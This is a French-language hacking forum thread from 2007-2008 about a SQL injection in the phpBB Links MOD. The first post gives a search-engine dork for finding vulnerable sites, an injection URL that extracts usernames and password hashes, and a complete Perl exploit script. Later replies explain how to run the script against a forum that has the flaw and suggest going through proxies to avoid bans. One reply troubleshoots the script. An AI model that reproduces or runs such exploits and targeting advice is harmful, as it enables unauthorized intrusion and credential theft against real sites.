S'enregistrer | Rechercher | FAQ | Liste des Membres | Groupes d'utilisateurs | Connexion

  Nom d'utilisateur:    Mot de passe:       

Aller à la page 1, 2  Suivante  

Poster un nouveau sujet   Répondre au sujet Page 1 sur 2
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
MessagePosté le: Lun Nov 19, 2007 1:18 pm    Sujet du message: phpBB <= 2.0.22 - Links MOD <=v1.2.2 SQL Injection Répondre en citant

Korigan
Site Admin


 
Inscrit le: 29 Mai 2007
Messages: 1781



pour trouver les sites faillibles :
allinurl:links.php?t=search
ou: "Links MOD v1.2.2 by phpBB2.de"


L'exploit en lui mĂŞme :

SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*



le code en perl :
Code:

#!/usr/bin/perl

print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
  or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2007-08-31]

Attention, cet exploit est très connu et de nombreuses protections existent déja.
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail
MessagePosté le: Lun Nov 19, 2007 7:05 pm    Sujet du message: Répondre en citant

mosquitox
Projets


 
Inscrit le: 09 Juil 2007
Messages: 225



yep en plus on se fait ban si on test ça sur un serveur sécurisé ^^ essayer ça en passant par proxy Wink
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mer Déc 19, 2007 12:51 pm    Sujet du message: Répondre en citant

jadlegone
Projets


 
Inscrit le: 19 Déc 2007
Messages: 4
Localisation: Liban



hehe dsl mais c'est quoi ce charabia?Smile
Voir le profil de l'utilisateur Envoyer un message privés MSN Messenger
MessagePosté le: Mer Déc 19, 2007 2:27 pm    Sujet du message: Répondre en citant

freerider
Projets


 
Inscrit le: 11 Nov 2007
Messages: 6



L'exploit il faut le rajouter derrière l'URL ?
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mer Déc 19, 2007 7:36 pm    Sujet du message: Répondre en citant

Korigan
Site Admin


 
Inscrit le: 29 Mai 2007
Messages: 1781



C'est un script perl.
Il faut donc le mettre dans un fichier .pl puis l'interpréter avec votre programme perl.
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail
MessagePosté le: Mer Déc 19, 2007 8:34 pm    Sujet du message: Répondre en citant

mosquitox
Projets


 
Inscrit le: 09 Juil 2007
Messages: 225



Active perl est très bien si vous voulez cela ^^ Après il est possible que votre fenêtre dos se ferme très vite après l'exécution du programme sans en avoir les résultats. Alors lancer cmd.exe puis exécuter votre programme depuis là
Wink
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mar Jan 08, 2008 6:58 pm    Sujet du message: Répondre en citant

olaf
Projets


 
Inscrit le: 08 Déc 2007
Messages: 72
Localisation: chez moi



bon j'imagine que l'exploit présenté ci-dessus est dépassé, mais c'est pas grave, pour me familiariser avec la "chose", j'ai choppé active perl, et tenté cet exploit.
J'ai donc crée un fichier .pl, activeperl le reconnait, super...
quand je le lance s'affiche une invit, je rentre l'adresse d'un forum... et lĂ , je ne sais pas quoi faire.
Avez-vous un tuto Ă  ce sujet?
merci
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mer Jan 09, 2008 1:05 am    Sujet du message: Répondre en citant

Korigan
Site Admin


 
Inscrit le: 29 Mai 2007
Messages: 1781



olaf a écrit:
bon j'imagine que l'exploit présenté ci-dessus est dépassé, mais c'est pas grave, pour me familiariser avec la "chose", j'ai choppé active perl, et tenté cet exploit.
J'ai donc crée un fichier .pl, activeperl le reconnait, super...
quand je le lance s'affiche une invit, je rentre l'adresse d'un forum... et lĂ , je ne sais pas quoi faire.
Avez-vous un tuto Ă  ce sujet?
merci


Que te renvoie le script?
Il est censé te donner un hash MD5.
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail
MessagePosté le: Mer Jan 09, 2008 8:58 am    Sujet du message: Répondre en citant

olaf
Projets


 
Inscrit le: 08 Déc 2007
Messages: 72
Localisation: chez moi



je rentre l'adresse du forum et ça me donne ceci :

=> insert directory
=> es: /forum/ - / phpbb2/
=>

je ne sais pas quoi mettre , mais si je tape quelquechose ça me donne encore ceci :

=> user ID
=> number !
=>

et après je tape encore n'importe quoi, et la fenêtre se ferme...
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mer Jan 09, 2008 8:36 pm    Sujet du message: Répondre en citant

Korigan
Site Admin


 
Inscrit le: 29 Mai 2007
Messages: 1781



Tu dois attaquer un forum possédant la faille.
(On aurais du commencer par lĂ )

Ton forum est t'il bien un phpBB2 <=2.0.22 ayant le mod Links <=v1.2.2 ?
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail
MessagePosté le: Jeu Jan 10, 2008 6:14 pm    Sujet du message: Répondre en citant

mosquitox
Projets


 
Inscrit le: 09 Juil 2007
Messages: 225



Faites très attention quand à l'utilisation de ce script, il est détecté et vous allez être banni du site Wink
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Lun Mar 03, 2008 2:09 pm    Sujet du message: Répondre en citant

Ar-S
Projets


 
Inscrit le: 22 Fév 2008
Messages: 61
Localisation: DTC



De toute façon ce genre de script est à utiliser avec des pincettes, à defaut de pincettes, de proxy Razz
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Lun Mar 03, 2008 2:34 pm    Sujet du message: Répondre en citant

baltazare
Modérateur


 
Inscrit le: 03 Sep 2007
Messages: 607



Je vais tester^^
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mar Mar 04, 2008 2:25 pm    Sujet du message: Répondre en citant

baltazare
Modérateur


 
Inscrit le: 03 Sep 2007
Messages: 607





Il y a donc une erreur dans la ligne 44?

ligne 44 Ă  47
Code:
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";



Si un connaisseur de perl peut m'aiguiller.
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Mar Mar 04, 2008 7:58 pm    Sujet du message: Répondre en citant

kmkz
Projets


 
Inscrit le: 06 Fév 2008
Messages: 120
Localisation: Carcassonne, Toulouse



yop!
Visiblement l'erreur s'est produite a l'entrée utilisateur <stdin> .Essaye de modifié le script en utilisant le module Warning ( use Warnings; au début du code) pour éventuellement avoir plus d'infos ( meme si ici tu n'en a pas trop l'utilité ^^).

VĂ©rifie l'url car l'erreur viens d'une mauvaise saisie utilisateur a premiere vu.
Et vérifie de bien la rentré correctement , l'erreur classique : "l'exploit ne marche pas " alors qu'il suffit parfois de savoir exactement se que le prog attend exactement comme infos et ça marche nikel.
Voir le profil de l'utilisateur Envoyer un message privés Visiter le site web de l'utilisateur
Poster un nouveau sujet   Répondre au sujet Page 1 sur 2

Aller à la page 1, 2  Suivante  


 
Sauter vers:  
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum



129144 Attacks blocked